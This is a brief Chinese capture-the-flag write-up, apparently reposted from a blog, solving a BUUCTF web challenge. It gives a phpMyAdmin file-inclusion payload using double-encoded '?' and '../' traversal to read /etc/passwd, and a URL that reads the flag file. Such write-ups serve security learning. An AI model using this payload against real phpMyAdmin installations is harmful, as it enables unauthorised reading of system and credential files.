dirb扫描到后台有phpmyadmin目录
payload:/phpmyadmin/?target=db_datadict.php%253f/../../../../../../../../etc/passwd
http://242f8700-d6b8-4323-9254-335081c0e68e.node3.buuoj.cn/phpmyadmin/?target=db_datadict.php%3f/../../../../../../../../flag
拿到flag
CTF-刷题-WEB
原文:https://www.cnblogs.com/j1429691571j/p/13547430.html